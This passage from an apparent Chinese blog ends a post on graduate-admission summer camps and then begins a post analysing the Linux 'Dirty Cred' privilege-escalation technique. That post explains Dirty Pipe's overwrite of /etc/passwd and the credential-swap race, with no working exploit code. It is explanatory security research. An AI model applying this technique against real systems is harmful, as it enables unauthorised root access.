人大先前以为报的人太多，筛材料的时候会把自己筛掉，结果后来竟然入营了，真是意外之喜。看来人大应该是会综合材料来筛选，不是简单的 title + rank 筛法。

人大是一个小而精的学校，学校虽然不大但是地理位置真的就是在黄金地带（中关村），因此去人大确实非常的赚。（而且人大这几年计算机一直在高速发展）

时间表

7.3 下午人大信院专业面试。

人大还有笔试，可以用 CSP 抵。有笔试就有模拟环节，不过我用 CSP 抵掉了就省略了这两个环节，不然就和南大笔试冲突了。今年 CSP 300 抵的分数没有去年多，本来以为抵掉就亏了，不过貌似今年的笔试题比去年要难很多，实际上还是赚了。

专业面试

人大考核受限于保密条例，不会在这里说明更多细节，只能说点自己的经历。（人大对面试题的保密性要求非常高，面试前强调一下，面试后又强调一下）

英语面是我面的最差的一次，磕磕绊绊几秒钟卡一下然后蹦出几个单词，主要还是有点紧张，就没答上来。这个环节可能是因为比较难，所以分数占比应该会稍微比较高（猜测）。

后面的面试就没啥了，比较顺利，老师也不会为难你。只要你完成回答后半秒内没有继续回答，老师就会直接切换到下一个问题，不会继续刁难，非常舒服。

导师面

面完后的那个晚上，面我的那个导师打电话联系我并简单的聊了聊相关的工作（声音很好听人也挺大牛的）。因为我本科阶段在模糊测试方面接触的比较多，老师也希望我能来人大。不过他也坦言导师在面试过程中的影响很有限，主要还是看自己。

结果

面试结束后的记录：

一个字，寄！可能还是英语面太拉跨了，同时竞争压力也有点大。原先信安是 25 进 2，结果笔试的时候筛掉了一部分，实际上参与面试的就只有 15 个左右。

只希望自己排在 waiting list 靠前的位置，这样应该能候补上。按照往年的情况，人大信安这块可以候补到第七左右。

人大结果出的很快，它是分的三天来面试，分别面直博、学硕和专硕。面完的第二天就会发邮件，例如在人大面专硕的那一天就能收到学硕的邮件（如果有）。

后续：好家伙，还真给我发优营了，真是太感动了。今年信安优营有 3 个，真是让我感动的不行。

c. 北大软微

入营

北大软微今年貌似是第一次开夏令营，先前都只有预推免，因此很多人猜测软微这是要搞什么大动作。

首先是材料递交申请，软微会先筛掉一部分材料不合格的，之后让材料合格的同学选择一篇论文做一个文献阅读笔记，之后专家再来根据这个笔记筛选。等这个流程全部都通过后才算是入营，今年入营 212 人，只有一半能留下。

论文选择主要有五个方向，选的那个方向的论文读就是你最终选择的方向。五个方向分别是：

系统软件（泛在操作系统、数联网系统软件等）
高可信软件（软件与系统安全、区块链与隐私计算等）
领域智能软件（大数据机器学习、分布式智能运维等）
领域智能软件（多模态知识计算、程序分析与理解等）
领域智能软件 (智能计算与感知等)

下面三个方向不考虑。我本来是想选第二个方向的论文的，但是那个方向列出来的论文我看着难受，一半都是机器学习，剩下的有区块链什么的，因此我最终选择的是方向1中的一篇，将污点分析技术与大数据引擎结合来进行隐私保护的论文。

文献阅读笔记要求至少 1.5k 字，但是很多 2k 字的都没入营，入营的我简单统计了一下基本上都是 4k 字往上走（包括我）。

个人感觉这不是卷，只是因为 2k 字实在太少了，不好描述论文讲的内容。

时间表

7.10 上午北大软微开营
7.10 下午北大软微课题组座谈会
7.11-7.12 北大软微面试

开营

之前的北大软微以就业为导向，去那边的基本上就是面向就业，因为可以放实习，很多同学过去后都可以实习一两年，非常舒服，甚至绿群里流传着《软微圣经》这样神奇的东西…

但是！从今年开始，一切都变了。今年面向推免生的软微，要面向科研方向招生。换句话说，今年招的专硕不再是普通工程硕士，而是前沿工程硕士，招专硕过去搞科研但没有论文指标，看的总感觉有点奇怪。

今年软微招生的老师有一半是来自于北大信工那边的老师，挺多老师的实验室设立在燕园（北大本部）。因此对于方向1来说（我只知道方向1），软微3年 = 大兴 1年 + 1.5年北大燕园科研 + 0.5 年实习。

燕园科研学校不会分配住宿（人家本部自己都住不下了怎么会分给别人…），因此软微等要去燕园做科研的话，学生要自己找房子租，不过院系补贴 2.5k + 老师实验室科研补贴应该可以涵盖燕园房租（房租大概3k+），因此实际上还算挺香的，就连北大信科也是在昌平那么偏远的地方。

非常罕见的是，今年软微院长说没有开预推免，软微会把入营的营员都放入 waiting list 中以防止鸽穿。

不过这个看具体方向，有些方向的老师就说不准备 waiting list 了，鸽穿就鸽穿。
我寻思着应该是他们在信科也有招生名额，不缺软微这几个，所以很有底气。

专业面试

面试的话要准备一个自我介绍 PPT，像老师展示自己的实力。面试的 j 老师非常的和蔼，整体上面试非常的轻松愉快。

英语面试真就是走个过场，老师问我你还报了哪些学校的夏令营，我说我报了复旦的夏令营，但是被他们拒绝了；我还报了清华的夏令营，但是连营都没入（捂脸）。

但是！面试老师说，我的专业性太强了（因为我本科阶段主要还是搞的软件安全，并且出漏洞了），他们方向1这边主要还是做系统软件。j 老师挺想收我的，但是他是之前搞得安全，现在已经不搞了，因此把我推给了方向2的老师。

结果方向2老师没有打电话给我（导师会打电话发 offer 确认学生来不来的）。面试完的第二天晚上 j 老师给我打了个电话，以为方向2老师已经给我打电话了，结果没有，怪尴尬的（捂脸）。后来我又主动发邮件 + 找学长内推方向2的 s 老师，结果石沉大海，我估计软微要寄。

结果

一直没收到方向2老师的电话，是真的寄了… 看着隔壁计科专业 rk1 rk2 分别上岸 pkucs 和 thusz，属实是羡慕极了。

优营名单出来的那一刻还是写了封邮件给 j 老师，希望后面要是有鸽子就考虑一下我。

可惜没拿到 pkuss 保底。

题外话

今年 pku 计算机和深圳研究院都是弱 com，只要有老师要你就可以上岸。可惜当时从哪里听说 pku cs 是强 com，所以就没联系导师，可惜。

虽然软微今年面向科研招生，但是实际上也有一些不怎么管学生的导师，跟着他们应该还是和之前一样能去实习。

d. 上交软院

入营

上交软院想冲一下 ipads 实验室，那边搞系统真的是非常的强，可以说是国内搞 OS 最强的实验室。x 老师学术能力非常强，而且和蔼，还帅（滑稽）。四月末的时候发了个邮件尝试联系他，收到了一个标准回复。

不过没想到的是他竟然真的翻看了我的博客，而且还因为我博客中记录了关于 uCore 课程的笔记（uCore 课程笔记我记的贼详细，可以说应该没有人在 uCore 上的笔记比我更详细了），于是就把我的博客推给了 uCore 作者之一——清华大学计算机系 chyyuu 老师，之后…

属实是把我感动到了呜呜。后来和 chyyuu 老师打了个电话唠嗑唠嗑，简单聊了聊这方面的内容，也为我增加了点夏令营的信心，挺感谢这两位老师的。

时间表

7.9 交软演练
7.11 上午交软开营，下午交软机试
7.12 上午交软报告
7.13 交软专业面试

开营

开营那天上午，我赶着去自习室准备听开营，结果电动车出车祸了撞人了呜呜，那天上午便带着伤者去医院检查，开营完全没听。后来听绿群群友说，ipads 只招收推免生 5-7 个左右。虽然 2021 年招收了这些人：

但是实际上里面也有些考研、联合培养啥的，推免生招的确实很少，竞争压力非常激烈。

而且交软入营的人大概有100出头，一开始报 ipads 的就有 50+，可想而知这里面的竞争是有多激烈…

机考

上交软院的机考出了名的具有特色，是种超大型模拟题（能做3小时的那种模拟题）。今年的模拟题主要是要手动实现机器学习中的决策树，不涉及图形界面，难度稍微降低了点。不过我的做题策略有点问题，我是先把代码写的差不多之后再来做测试，因此后面时间来不及测试完全部代码，只测试了一半的代码，不知道机考会怎么算分。

在机考前，交软会发放 VPN 账户和远程虚拟环境的访问账户和密码，要求我们自己去配置交软远程机器的环境（自己配置 IDE 等）。后面机考的代码编写全都要起一个远程桌面连接，在远程环境下完成，并且在远程桌面下录屏。

远程环境的配置：CPU 至强系列，内存 16 GB，磁盘空间 80 GB，也算够用，我装了 Visual Studio、VSCode、PyCharm 等，还拷贝 C++ 文档、Python 文档至远程环境上，后来发现只用上了 VS，文档啥的完全没用上。

但远程环境也有点问题：

磁盘性能卡顿。磁盘是 HDD，因此稍微操作一下电脑，整个磁盘活动率就达到 100%，新建个文件夹都会卡上好久（一定概率）。第一次用 VS 编译 hello world 时花了 10s … 不过后来还好，只要事先把 VS 开好，等一切都加载完成后就没什么大问题。
网络环境。网络环境的波动会极大的影响自己操作远程环境的舒适程度。听说有人在考试时因为远程环境卡成 PPT 愤然弃考…

上交机考原定是 15:00 开始，但是由于一直都有同学无法连上远程 VPN，因此一直拖到了后面大概 16:30 才开始。那天下午机试正好和软微面试冲突了，原来是打算先面完软微后再来迟到的参与上交机考，但是那天真就非常巧合的遇上了 VPN 连接失败的事故，以至于面完软微后刚好可以参与上交机考。但同样非常巧合的是，那天软微是最后一个面我的（简直绝了…）。

我所在的那个云考场老师之前说得等所有人进了考场后才能发放题目，我面完软微后就紧急去问绿群群友他们的监考老师手机号，然后打电话找到了我所在的云考场会议号，接下来才开始机试，属实是感动到了。

机考分数没到 60 将不能参加后续的面试。

专业面试

ipads 的面试和往年一样，看论文然后到时候提问。面试流程大概是先用 PPT 介绍一下自己，然后中间提问论文最后英语面。

面试的老师非常的和蔼随和，但是问题是真的刁钻…

一开始我以为提问论文是考验你对论文的熟悉程度，于是考前读了两遍论文并且熟悉论文中的每一个点，就连评估那块的数据我都差点背下来了。但是老师提问的是对论文的科研开放思维，例如你觉得某某检查应该放到哪里来检查，硬件还是软件；某某东西在论文里是只能在一个 CPU 上做的，但我要是想让他在多个 CPU 上并行处理，你觉得该怎么做等等。其他人问到的问题我不太晓得，但是我问到的问题都是这种非常开放性的东西。

真的是完全答不上来…哑口无言属于是。主要是那些问题不是可以脱口而出的东西，需要花些时间理顺逻辑，不过在当时的情况下已经没法暂停思考了，只能想到什么说什么，已经白给了…

英语面的时候让我用英语介绍一个自己的项目，随便介绍一个，我就挑了先前混的那片论文简单讲了讲。

面的时候老师着重的问了我的代码能力，我说那个 Fuzzer 2w 行代码我写了大概 1.2w 行这样。

整体面试还是非常轻松愉快的，总时间卡死 20 分钟，答不上问题老师会引导。只能怪自己还是太菜了呜呜…安慰自己喜提 ipads 面试体验卡。

结果

上交无论什么院的考核，结果都是八月底出，这个和其他学校不太一样。其他学校都是面试后的一周内甚至三天内出，上交就会慢一点。直博出的比直硕早，大概八月中旬前就会出，貌似比较水（看院系）。

不过无所谓了，反正面试比较惨，排名应该会很后面，面完已经开始摆烂了。

而且通常来讲，上交软院的名额会优先分配给已经进组实习的同学（猜测），因此对于外校生来说，想拿到学硕的可能性会更低。

以及，骑电动车要走绿道呜呜赔惨了。

果然，后来发邮件给了个替补第六，约等于寄。

e. 武大网安

入营

武大网安当初是随便报的一个，感觉自己可能大概率不会来这里，不过还是为了刷刷面试经验就报了这个。

时间表

7.11 下午开营（没听，因为在进行软微面试和交软机考）

7.12 专业面试（我排到下午了）

7.13 上午闭营

面试

武大网安的面试顺序是在群视频中直播抽签过程，整个过程非常快，我刚好轮到下午。

面试的时间非常短，一个人大概也就七八分钟，我是下午第6个，结果大概开始面试35分钟后就轮到我面了 … 当时我设备啥的还在调试，非常凑巧就赶上了。

武大网安面试的方式是最奇怪的一个，监考端用腾讯会议（没啥问题），但是面试端用 QQ 视频，这个就有点神奇了（捂脸）。

问的问题主要是围绕那片三作论文以及 Fuzzer 工具，应该是面向论文和项目提问。

问的时候问了我：**你有什么奖项吗？**这个属实是我的缺点… 回答：我在竞赛方面没有特别突出，只拿了一些校级和省级奖项（捂脸）。

结果

优营，不过我放弃掉了，因为在出最终优营名单之前中科大 offer 下发了，所以想赶紧释放武大 offer 尽可能地把机会留给后面的同学。

f. 南大计算机

时间表

7.4 下午：南大模拟面试

7.7 下午：南大笔试

7.13-7.14 专业面试

笔试

南大今年貌似开了千人海营，因此要通过笔试筛掉一大半。笔试 1小时 81道题（单选多选题都有，纯选择题），多选题多选漏选错选均不得分，设计的考点包含数据结构、读代码模拟执行的结果、计网操作系统啥的，还有 linux 相关的题目。涉及的考点非常复杂，覆盖面非常广，不只 408，还有 Java lambda 表达式的字节码是什么表示等这种奇怪题目。

笔试很具有区分度，筛掉了一大半的人（听说是 2k 进 200，小道消息），感觉笔试就是筛选那些运气和基础不错的学生（捂脸）

实验室面

南大要求在院系面试前自己选择参与众多实验室的面试，因此我选择了唯一一个搞漏洞挖掘的实验室——SecLab。

Seclab 的 m 老师也非常的强，在很多学校都做过学术报告（本人有幸在清华实习期间聆听过 m 老师的报告，很有意思）。

虽然在实验室面时没有见到 m 老师，但实验室面时那几位面我的同学也是非常的 nice，有一位博士生还是最强大脑选手（膜拜）。

最后面的都很开心，结果后续院系考核寄了，属实是无语住了…

专业面试

运气好过了笔试，结果面试是真的硬核…网上找了一圈都没看到什么南大面试的面经，我是第二天面的，根据前一天绿群群佬的面试经历来看，南大会比较喜欢考离散数据结构。但是这两天被车祸事故折腾的要死要活的，一点都没准备，结果面试直接寄了… 属实是祸不单行（捂脸），只好安慰自己祸依福所依，福依祸所伏了…

面试流程大概是这样：

面试不问项目不问经历不问科研不问自我介绍，就纯纯的问专业课。
进去之后，第一问，请你用英语，描述 Kruskal 算法解决了什么问题，算法过程是什么样的，开销是多少
是不是很硬核，捂脸，答得巨烂。
之后的问题都是中文。先问离散再问数据结构，最后问了个操作系统的题目以及一个开放题。
南大面试貌似非常注重离散数学，因此最好要多复习复习。（我就吃了这个亏）
开放题问的是在课外主要做什么？我：我做了一个项目 balabala… 感觉这个回答的非常差劲，我估计不是他们想要的那种回答。

可以说南大的面试是我所有面试中，表现最差的（比人大面试表现还差）。虽然面试是彻彻底底的寄了，不过按照往年的面经来看，南大貌似会被鸽穿，感觉还是有戏，晚点再看看。

结果

waiting list 80 左右。已经完全不抱希望了，毕竟寄的这么惨…

貌似南大进了夏令营之后就不能再参加预推免了，感觉更没戏了…

虽然听说往年南大被鸽穿到候补 80+ ，不过预推免的 waiting list 和夏令营的一起排，因此估计我的 waiting list 排序会更后面一点。

g. 中科大网安

入营

入营即送大礼包：

专业面试

面试分为两轮，每轮每个人10分钟，需要做 PPT 展示。两轮中只有一轮会有英语问答环节，ppt展示和专业课抽题做答两轮都有。

结果

优营。感觉中科大优营对于 985 院校学生来说很好拿。我们这第一届网安学院夏令营 136 进 100 个优营。

不过有了优营之后还需要立即联系老师，在推免系统填报前和老师双选，否则优营作废。

我个人的建议是最好在拿到优营之后联系老师，因为老师可能更愿意接触那些有优营资格的学生。

我先前联系了一位偏向密码学应用的老师，老师理解也愿意一直为我保留名额直到我冲完清北，所以其实我后面要鸽掉他还挺难受的，受到了自己道德上的谴责呜呜。

h. 中科院计算所

入营

某天中午吃饭的时候突然就接到了中科院计算所老师的电话，邀请我晚上和老师简单聊聊。

其实入营我还挺惊讶的，不过个人对中科院的所不是很感兴趣，因为科研氛围太过浓厚，我还是更想去一个多元化的大学，过个丰富的研究生生活（笑）。

有点尴尬的是当时中科院计算所的意向导师，我在填完之后就已经忘得一干二净，还是后面和导师简短 1 对 1 面试时才从腾讯会议名上想起来…（后来发现不只我一个人把意向老师忘了，笑）

简短面试

被拉到微信群里后才知道原来面试的不只是我一个，平均每个人的面试时间是 10 分钟。

意向导师会让你先做个自我介绍（毕竟老师啥材料都没有，根本不知道你的优势是什么），因此自我介绍要好好答。

之后老师针对我的实习经历与科研经历进行了一些提问，例如这个工作做的是什么等等，都是一些比较好回答的问题。

最后老师问了我一句“你调试过 Linux 源代码没有”，我说有且调试过今年年初爆发的 Dirty Pipe 漏洞，老师就让我介绍了一下，在介绍过程中频频点头，最后点评了一句回答的挺清晰的。

基本上简短面试问的也不长，比较轻松愉快。不过意向导师说自己只有专硕名额，让我自己做抉择来考虑要不要参加他的面试考核。

结果

在简短面试之后我就跑路了，因为自己还是更偏向于去大学深造，同时专硕也不太满足自己的预期。

3. 夏令营的一点总结与经验

在入营的时候，title 和 rank 至关重要，尤其是对于那些筛人时暴力 title & rank 筛的学校，这里点名复旦。之前在绿群里看到一个末流211 rk1 多篇论文 + 多个国奖的佬，没入复旦计算机。当时看到他的消息时感觉这个有点戏剧化…
虽然 title 是由高考成绩决定，已经无法改变，但是 rank 确实可以再挣扎挣扎，rank 会直接影响到你是否能够入营。
ACM 慎重。除非拿 ACM 金，否则最好不要放弃科研和 rank。ACM 确实也是有优势的，有些学校对 ACMer 非常的青睐，但个人认为在上面的投入不如其他方面的性价比高。不过 ACMer 确实会在导师面等获取额外的印象分，这个看个人情况。
rank 和 title 会对入营起到很大的影响，但是在面试和导师面中，rank 和 title 反而是最不重要的，重要的是 科研经历与产出 > 项目经历 >= 竞赛经历 >= 大厂实习经历 >> rank。导师更看重你的科研能力而不是 rank。同时有些学校的院系面试都只是走个过场，真正决定你留不留的下来的还是看材料，因此这些东西还是非常重要的。纯 rank 选手必须在专业课上打下非常扎实的基础，否则科研比不过、项目没有、竞赛没有，那基本上就毫无亮点。如果想着以后保研，公司实习的事情就可以稍微放放，应该把更多的经历花在科研实习上。
如果想冲强组牛导，一定要提前去参与课题组实习，最少实习一学期起步。提前实习可以提早占坑提早内定，同时夏令营时也可以很舒服的通过。不要想着只用嘴皮子就能套几个牛导，人家早就有实习生直接进组实习了。
实习也是双方选择的一个过程，在实习的过程中导师可以确定是否要你，你也可以确定这个组的氛围如何，是不是自己想去的那样，和先前的想象是否存在点出入。
同理，报那种以实验室为单位进行考核的院校，没有提前联系导师会吃大亏，这种实验室会优先收实习生（例如上交 ipads）。收的人越少，在没提前联系导师的情况下就越进不去。
鸽导师慎重，尤其是同领域内的导师。我在整个夏令营阶段套的导师不多，只有五位。但是这五位导师真就相互认识，有些甚至是很好的朋友，我联系的导师几乎每个都问过我一遍你为啥不冲一下清华…因此最好在和导师聊的时候，实诚一点，让导师知道你可能不来的想法，提前打好预防针，同时也让老师知道你的难处。
当然，这点仁者见仁智者见智，有些同学鸽导师真是一个比一个狠…对于自己的发展来说，也不能说是做的不对，只能说还是得根据自身情况和导师角度来考虑。同时也为自己的学弟学妹们考虑，最好别用本校下届学子的福禄来为自己的前途铺路。

总结：套磁进组实习 >> 科研经历与产出 > 项目经历 >= 竞赛经历 >= 大厂实习经历。
事实上面试的时候还挺多导师问我关于腾讯实习的经历。

四、预推免

预推免的处境会比夏令营更难！整体上来看，大部分学校（包括中九那些）预推免的 bar 都会提高，可能之前夏令营是 rank 5% 能进，那预推免就会到 3% 了。预推免招的大部分都是 waiting list，老师收的大部分还是夏令营的营员。不过好在有一门国三水奖在预推免之前出结果了，同时绩点又上去了 0.01，因此我的处境稍微好些。

预推免时目前有了人大信院学硕和中科大学硕（武大被我放掉了，预推免系统没填）。由于人大 seclab 老师做的方向和我也很贴切，同时人大地理位置非常优越（北京四环以内），因此除了清北以外，人大 offer 对我来说应该算是最优解了，所以在预推免时就简单冲击其他华五学校的夏令营。这里稍微点一下华五学校的预推免情况：

人大：信院没有预推免。
南大：参加了夏令营就不准再参加预推免，但是预推免系统还是要填的。
复旦：主要的名额都在预推免，不过那里的导师和我做的方向还是不太搭。
浙大CS网安：21年学硕只有25个，其中13个本校生，个人感觉竞争不是一般的激烈。
上交：预推免基本上是直博生以及面向本校的推免，外校硕士毫无机会。
上交直博只要提前联系导师就好，超级好进。
中科大：~~网安貌似没有预推免了~~ 本来以为没开，结果还真再开一批。

清深（清华深圳研究院）和北深（北大信工）里面的老师，几乎全都是与大数据和人工智能相关，因此那边的老师对我的履历并不感兴趣（我做的东西和他们看中的完全不沾边），唯二和安全沾边的老师又上了研控网（懂得都懂）。在套不到导师的情况下，清深和北深在预推免基本上是没有机会的，因为大部分机会都在夏令营发放完了（我两个都没入营，笑），就算有鸽子也轮不到我候补。

北大系统一次性可以同时填报多个院系，但是北大每个院的 offer 也几乎完全在夏令营阶段发完了。预推免狂套 pkucs 导师，冲北大计算机主要是看能不能收留心碎被鸽导师（笑），不过看上去貌似是一点效果也没有，想上北大的还是得极度重视夏令营阶段。

那么这样以来，我预推免要冲的院系只剩下几个可选项了：

浙江大学CS网络空间安全学院
复旦大学计算机系
北大软微 or CS
清华大学网络科学与网络空间研究院，简称清华网研院。

首先是浙大。浙大今年 bar 巨高，一片拒信。外校生入场的可能只有两位数，网安那边据我所了解只有大概 50 来号人入了（包括本校和外校）。我也被拒掉了，可能是因为背景一般般吧，因为我看到有一个同水平但是 title 比我好很多的同学入了。

其次是复旦。复旦今年开的比较晚，大体上感觉预推免入的和夏令营入的还是同一批人，夏令营能进的预推免就能进，夏令营进不了的预推免还是进不了。我拿到了梦校的 offer 就把它鸽了，没再参与后面的面试流程。

之后是北大。北大虽然软微和 CS 都开了预推免，但是实际上并不收人，老师们已经在夏令营中被瓜分的差不多了，预推免基本上就相当于在招 waiting list，没有导师接收的话等于没戏。

最后是，清华网研院。

清华网研院，是我花了最多心思的目标院校，同时那里也有着我最想跟着一起搞研究的牛导，这里是我的最终目标，前面的一切夏令营+预推免活动都是在找保底院校。我在去年12月份便联系了导师，之后从寒假开始下半个学期一直在远程实习，实习了有大半年之久。在实习期间，我写过代码、辅助撰写过论文、逆向驱动等等，做研究的生活还挺充实的；而且在实习的过程中也确实感觉到组内氛围相当不错，这也加大了我想进组研究的意愿。

这里不得不提一句夏令营，夏令营招收 50 位学生，可能是材料和背景上的不足，竟然没有入营。后来了解到这个夏令营主要招直博生，直硕生招的少，这让我的心稍微宽慰了一点。

预推免进复试的共 75 个学生，只比夏令营多了25个，其中一半本校一半外校。本校和本校竞争，外校和外校竞争，学院招生名额对半分。这次外校直博有12人，直硕生有25人。外校生硕士名额是10个，25 进 10 稍微还是有点压力。

网研院的机考和计算机系、深研院是同一套的，这三个院系同一时间考同一套题，因此机考题不会太简单。这次预推免的题目不怎么偏向算法，以至于我苦练洛谷三个月最后愣是一点没用…不过自己还是考的比较差劲，只拿到了送的几个得分点。机考完后一直觉得自己考的巨差无比，尤其是今年机考成绩从 10% 变成了 20%，占比增大，机考的重要性翻倍。但是后来了解到机考成绩比我想象的要好，感觉又充满了希望。

面试细节就不过多描述了，学院官网上公示了考核方式，分为综合面试 8 分钟和专业面试 12 分钟，感兴趣的可以去看看。需要注意的是，在投递 top2 时，各类文书（例如个人陈述、PPT 等）一定要精雕细磨，因为老师真的会翻来覆去的看你的文书材料…我在面试时看到底下一群老师在翻来翻去的看个人陈述，感到有一丝丝的害怕，深怕哪里翻车了…

最后感谢各位一直在支持着我的老师同学以及学长学姐们：

五、鸽子

这里提几句鸽子情况。

上交 ipads 实验室。在清华网研院出结果（9月19日）以后发了个邮件询问了一下自己的替补排名，从原先的替补第六上升到替补第二，在9月25日收到了教务秘书的专硕递补电话。感觉上交鸽子也是很多的（虽然我也要鸽了，笑）。今年上交软院也有企业联培计划，工程硕士也是一年校内两年企业培养。
南大 928 直接鸽到候补 200 多（好像是），有志于南大的候补要求直接进行系统填报，在候补时优先候补这些填报系统的同学，而不是候补排名靠前但没填报系统的同学。在算上填报系统的候补同学后，如果招生名额还有空缺就会开始打电话。我候补80就在 928 那天被打了；室友貌似候补200名，928那天和南大招生办打了好几个电话，极限上岸（祝贺）。

浅析 Linux Dirty Cred 新型漏洞利用方式

2022-10-05T16:00:00.000Z

一、简介

Linux Dirty Cred 是一种基于 Dirty Pipe 漏洞所创新出来的新型漏洞利用方式。通过 Dirty Cred 的这种利用流程，其他位于 Linux 内核中的一些内存漏洞，在对其进行漏洞利用的过程里，可以转换为逻辑漏洞，来绕过当前所有的内核缓解机制（包括 CFI 控制流完整性保护）。

Dirty Cred 的核心利用思路是使用高权限 credential 对象来交换低权限 credential 对象，从而达到提权的目的。该论文目前已中 CCS 2022 & Black Hat USA 2022，属实是一个比较有趣的思路。

二、背景介绍

在讲述 Dirty Cred 前，需要做一些背景介绍来帮助理解。

1. Dirty Pipe

Linux Dirty Pipe CVE-2022-0847 是今年早些时候爆发出来的一个 Linux 内核提权漏洞。我曾在上半年写过一篇分析它的文章 - Linux Dirty Pipe CVE-2022-0847 漏洞分析 - Kipre’s Blog，因此就不在这里赘述了。

简单概括一下成因：

Pipe 结构是由一个环形队列组成，其中队列元素分别为实际存放数据的物理页的引用。对于某次 pipe 的写入操作，如果 pipe 队列头所在元素上的标志位为 PIPE_BUF_FLAG_CAN_MERGE，那就说明这次写入的数据可以直接合并至队列头的物理页里，无需重新创建新队列元素，减少内存占用。

Linux 中存在一个称为 splice 的系统调用，它可以直接将文件中的数据追加进某个 pipe 中。其本质原理是将该文件的页面缓存引用直接添加进 pipe 的队列头部。由于文件页面缓存可能用在多个地方，因此这些页面缓存在 pipe 队列中元素上的标志位就不能标注 PIPE_BUF_FLAG_CAN_MERGE，以便于防止在向 pipe 写入新数据时，错误地把新数据与页面缓存上的数据合并，对页面缓存进行误修改。

由于 Dirty Pipe 漏洞的根源是 pipe 队列元素上标志位的未初始化漏洞，恶意黑客可以先往 pipe 内使用 write 函数灌注大量数据，使得 pipe 队列上的每个元素标志位都标有 PIPE_BUF_FLAG_CAN_MERGE，再紧接着 read 出这些数据，将 pipe 清空，并之后使用 splice 系统调用将任意可读文件（例如 /etc/passwd）的页面缓存加载进 pipe 中。但 pipe 队列元素上的标志位并没有被重置，因此对于加载进 pipe 中的页面缓存元素，每个队列元素上的标志位都将残留先前所设置的 PIPE_BUF_FLAG_CAN_MERGE，这样一来后续的 write 便可直接污染本不该被修改的文件页面缓存，使得特权文件（例如 /etc/passwd）在内存中的数据被篡改，造成提权。

有意思的是，整个漏洞利用流程完全不涉及各类缓解机制。Dirty Pipe 是一个彻头彻尾的逻辑漏洞，这类逻辑漏洞可以完全绕过缓解机制，从而进行提权等操作。但 Dirty Pipe 又高度依赖 pipe 本身的能力（那种可以通过 pipe 将数据注入进任意文件的能力），换句话说即逻辑漏洞因为是逻辑错乱导致的问题，自然漏洞利用就必须与这个功能部件相关的逻辑高度关联。由于逻辑漏洞在相关逻辑的关联性较强，因此漏洞可以被非常容易地防护，影响范围并不会特别广。

2. Credentials

Linux 的 Credentials，通常将其认为是内核中用于存放特权信息的内核属性。我们所熟知的 Credentials 有两种（总数不止两种）：

struct cred：其中存放了一个 task 的权限信息，例如 GID、UID 等等。如果能任意修改一个低权限进程的 cred 结构体，那么我们就可以将该进程提权至高权限（例如 root）。

// include\linux\cred.h
struct cred {
 atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
 atomic_t    subscribers;    /* number of processes subscribed */
 void        *put_addr;
 unsigned    magic;
#define CRED_MAGIC   0x43736564
#define CRED_MAGIC_DEAD  0x44656144
#endif
 kuid_t      uid;        /* real UID of the task */
 kgid_t      gid;        /* real GID of the task */
 kuid_t      suid;       /* saved UID of the task */
 kgid_t      sgid;       /* saved GID of the task */
 kuid_t      euid;       /* effective UID of the task */
 kgid_t      egid;       /* effective GID of the task */
 kuid_t      fsuid;      /* UID for VFS ops */
 kgid_t      fsgid;      /* GID for VFS ops */
 unsigned    securebits; /* SUID-less security management */
 kernel_cap_t    cap_inheritable; /* caps our children can inherit */
 kernel_cap_t    cap_permitted;   /* caps we're permitted */
 kernel_cap_t    cap_effective;   /* caps we can actually use */
 kernel_cap_t    cap_bset;        /* capability bounding set */
 kernel_cap_t    cap_ambient;     /* Ambient capability set */
    ...
}

struct file：存放一个文件的部分权限信息，例如 read & write 权限等。如果一个低权限用户可以任意修改高权限文件（例如 /etc/passwd），那么同样也能造成提权的目的。

// include\linux\fs.h
struct file {
 ...
 struct path    f_path;
 struct inode        *f_inode;   /* cached value */
 const struct file_operations    *f_op;

 /*
  * Protects f_ep_links, f_flags.
  * Must not be taken from IRQ context.
  */
 spinlock_t          f_lock;
 enum rw_hint        f_write_hint;
 atomic_long_t       f_count;
 unsigned int        f_flags;
 fmode_t             f_mode;           // !!: O_RDWR
 struct mutex        f_pos_lock;
 loff_t              f_pos;
 struct fown_struct  f_owner;
 const struct cred   *f_cred;      // !!: cred
 struct file_ra_state   f_ra;
 ...
}

需要注意的是，struct file 只保存已被打开文件的信息。如果某个文件连打开的权限都没有，那自然就不可能会有对应的 struct file 结构体。

至于文件的属主等其他特权信息，则存放在 struct inode 中，这里不再赘述。

3. Allocator

众所周知，Linux 内核主要使用 slab 分配器来进行内存分配。slab 分配器中主要维护了两种内存缓存（即可以理解成两套作用不同的内存分配方式）：

dedicated cache: 这里的内存是用于分配给内核中的常用对象。在该缓存中被分配的结构体将始终保持初始化状态，以便于提高分配速度。
generic cache: 通用缓存。大多数情况下其内存块的大小与 2 的幂次方对齐。

这类 cred 和 file 结构体等 credential 对象都是在 dedicated cache 中分配，而大多数内存漏洞发生的地方都是在 generic cache 中。

可以在终端中键入 sudo cat /proc/slabinfo 来查看 slab 分配器的具体信息。其中这些名字互不相同的内存块即 dedicated cache：

后面那些名称中带有 kmalloc 的即 generic cache：

三、威胁模型

攻击者层面
- 低权限用户可以接触访问目标 Linux 系统
- 已经存在一个堆破坏的内存漏洞
- 打算使用该漏洞进行本地提权
不考虑硬件对漏洞利用所带来的帮助。
被攻击平台层面
- 启用所有缓解机制（例如 KASLR, SMAP, SMEP, CFI, KPTI）

四、面对的挑战

先简单介绍一下 CVE-2021-4154，来说明 Dirty Cred 是如何利用的，先上一张图：

其实看图也能大致看出来是什么样的过程。太长不看版本就是，写入一个文件需要顺序执行：

文件权限检查（是否可写）
开始实际写入数据至文件

如果在这两个步骤之中进行竞争，在成功检查文件权限后（/tmp/x 可写），触发漏洞恶意将原先的 credential 结构体（这里是 file 结构体）释放，并创建 高权限的 credential 结构体（例如/etc/passwd 的 file 结构体）来占据这个内存空洞，那么待写入的数据就会被写入进 /etc/passwd 中，造成本地提权。

那么 Dirty Cred 所面对的挑战其实也可以看得出来：

如何将内存破坏漏洞，转换为能够置换 credential object 的原语。
如何延长文件的权限检查- 数据写入的竞争窗口。
如何创建高权限的 credential object，来占据先前被释放的低权限 credential object 内存空洞。

五、置换 credential object

内存破坏漏洞常见的种类有：

Invalid-Write: Out Of Bound Write (Read 肯定没法利用了，只能泄露数据)、以及 Use after Free。
Invalid-Free: Double Free

接下来将分别说明如何利用这几种内存漏洞，来达到使用 privileged credential 置换 unprivileged credential 的目的。

1. Out Of Bound Write

太长不看，直接看图：

